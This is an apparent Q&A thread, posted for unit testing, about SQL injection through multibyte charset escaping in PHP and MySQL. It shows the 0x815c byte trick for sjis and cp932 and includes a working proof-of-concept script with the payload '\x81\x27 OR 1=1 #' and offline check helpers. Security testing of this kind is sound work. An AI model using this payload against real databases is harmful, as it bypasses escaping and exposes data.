php mysql security encoding sql-injection

How to create a SQL injection attack with Shift-JIS and CP932?


I'm writing some unit tests to ensure my code isn't vulnerable to SQL injection under various charsets.

According to this answer, you can create a vulnerability by injecting \xbf\x27 when the connection uses one of the following charsets: big5, cp932, gb2312, gbk and sjis.

This is because if your escaper is not configured correctly, it will see the 0x27 and try to escape it such that it becomes \xbf\x5c\x27. However, \xbf\x5c is actually one character in these charsets, thus the quote (0x27) is left unescaped.
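The byte-level effect described above can be sketched without a database. This is only an illustration: addslashes() is used here as a stand-in for an escaper that is unaware of the connection charset (an assumption, it is not what MySQL's client library runs), and the mbstring extension is assumed to be loaded.

```php
<?php
// Stand-in for a charset-unaware escaper: addslashes() works on raw bytes.
$payload = "\xbf\x27 OR 1=1 #";
$escaped = addslashes($payload);

// A backslash (0x5c) was inserted in front of the quote (0x27).
echo bin2hex(substr($escaped, 0, 3)), "\n"; // bf5c27

// Interpreted as gbk, 0xbf 0x5c fuse into one character, so these three
// bytes are only two characters: [0xbf5c] followed by a bare quote.
echo mb_strlen(substr($escaped, 0, 3), 'GBK'), "\n";
```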

As I've discovered through testing, however, this is not entirely true. It works for big5, gb2312 and gbk, but neither 0xbf27 nor 0xbf5c is a valid character in sjis or cp932.

Both

mb_strpos("abc\xbf\x27def","'",0,'sjis')

and

mb_strpos("abc\xbf\x27def","'",0,'cp932')

return 4, i.e., PHP does not see \xbf\x27 as a single character. The same call returns false for big5, gb2312 and gbk.

Also, this:

mb_strlen("\xbf\x5c",'sjis')

returns 2 (it returns 1 for gbk).

So, the question is: is there another character sequence that makes sjis and cp932 vulnerable to SQL injection, or are they actually not vulnerable at all? Or is PHP lying, am I completely mistaken, and will MySQL interpret this totally differently?


Solution

  • The devil is in the details ... let's start with how the answer in question describes the list of vulnerable character sets:

    For this attack to work, we need the encoding that the server's expecting on the connection both to encode ' as in ASCII i.e. 0x27 and to have some character whose final byte is an ASCII \ i.e. 0x5c. As it turns out, there are 5 such encodings supported in MySQL 5.6 by default: big5, cp932, gb2312, gbk and sjis. We'll select gbk here.

    This gives us some context: 0xbf5c is used as an example for gbk, not as a universal sequence that works for all 5 character sets.
    It just so happens that the same byte sequence is also a valid character under big5 and gb2312.

    At this point, your question becomes as easy as this:

    Which byte sequence is a valid character under cp932 and sjis and ends in 0x5c?

    To be fair, most of the Google searches I tried for these character sets didn't give any useful results. But I did find this CP932.TXT file, in which, if you search for '5c ' (with the trailing space), you'll jump to this line:

    0x815C 0x2015 #HORIZONTAL BAR

    And we have a winner! :)
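The same search can be approximated in PHP itself. The sketch below is an assumption-laden shortcut rather than an authoritative list: leadBytesBefore5c() is a hypothetical helper, it relies on the mbstring conversion tables (which may not match MySQL's tables byte for byte), and it only looks at two-byte sequences.

```php
<?php
/**
 * Hypothetical helper: list the lead bytes B for which the two bytes
 * B 0x5c form exactly one valid character in the given mbstring charset.
 */
function leadBytesBefore5c(string $charset): array
{
    $leads = [];
    for ($b = 0x80; $b <= 0xff; $b++) {
        $pair = chr($b) . "\x5c";
        // Valid in the charset AND counted as a single character.
        if (mb_check_encoding($pair, $charset) && mb_strlen($pair, $charset) === 1) {
            $leads[] = sprintf('0x%02x', $b);
        }
    }
    return $leads;
}

foreach (['SJIS', 'CP932'] as $charset) {
    echo $charset, ': ', implode(' ', leadBytesBefore5c($charset)), "\n";
}
```

Any lead byte in the printed list is a candidate to pair with 0x27 in a test payload; 0x81 is the one used in the rest of this answer.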

    An Oracle document confirms that 0x815c is the same character in both cp932 and sjis, and PHP recognizes it too:

    php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis"));
    int(1)
    int(1)
    

    Here's a PoC script for the attack:

    <?php
    $username = 'username';
    $password = 'password';
    
    $mysqli = new mysqli('localhost', $username, $password);
    foreach (array('cp932', 'sjis') as $charset)
    {
            $mysqli->query("SET NAMES {$charset}");
            $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}");
            $mysqli->query("USE {$charset}_db");
            $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)");
            $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')");
    
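            // real_escape_string() still escapes using the client library's
            // default charset, because SET NAMES only informs the server.
            // It turns \x81\x27 into \x81\x5c\x27, and under cp932/sjis the
            // first two bytes form one character, leaving the quote bare.
            $input = "\x81\x27 OR 1=1 #";
            $input = $mysqli->real_escape_string($input);
            // The trailing # comments out "' LIMIT 1", so a successful
            // injection returns both rows instead of at most one.
            $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1";
            $result = $mysqli->query($query);
            if ($result && $result->num_rows > 1)
            {
                    echo "{$charset} exploit successful!\n";
            }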
    
            $mysqli->query("DROP DATABASE {$charset}_db");
    }
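For unit tests like the ones mentioned in the question, the effect of the PoC can also be checked offline, without a MySQL server. This is a minimal sketch under stated assumptions: quoteSurvivesEscaping() is a hypothetical helper, addslashes() stands in for a charset-unaware escaper, and mbstring's view of the charset is assumed to be close enough to MySQL's. It does not replace running the PoC against a real server.

```php
<?php
/**
 * Hypothetical offline check: after byte-wise escaping, does the payload
 * still contain a quote that is not preceded by a real backslash
 * character when the bytes are read in $charset?
 */
function quoteSurvivesEscaping(string $payload, string $charset): bool
{
    // Split the escaped bytes into characters as $charset sees them.
    $chars = mb_str_split(addslashes($payload), 1, $charset);
    for ($i = 0, $n = count($chars); $i < $n; $i++) {
        if ($chars[$i] === "\\") {
            $i++;        // a standalone backslash escapes the next character
        } elseif ($chars[$i] === "'") {
            return true; // bare quote: the string literal would end here
        }
    }
    return false;
}

var_dump(quoteSurvivesEscaping("\x81\x27 OR 1=1 #", 'SJIS'));
var_dump(quoteSurvivesEscaping("\xbf\x27 OR 1=1 #", 'SJIS'));
```

The first payload uses the 0x81 lead byte found above. The second is the gbk example from the question, which sjis reads as two separate characters, so the inserted backslash keeps its meaning.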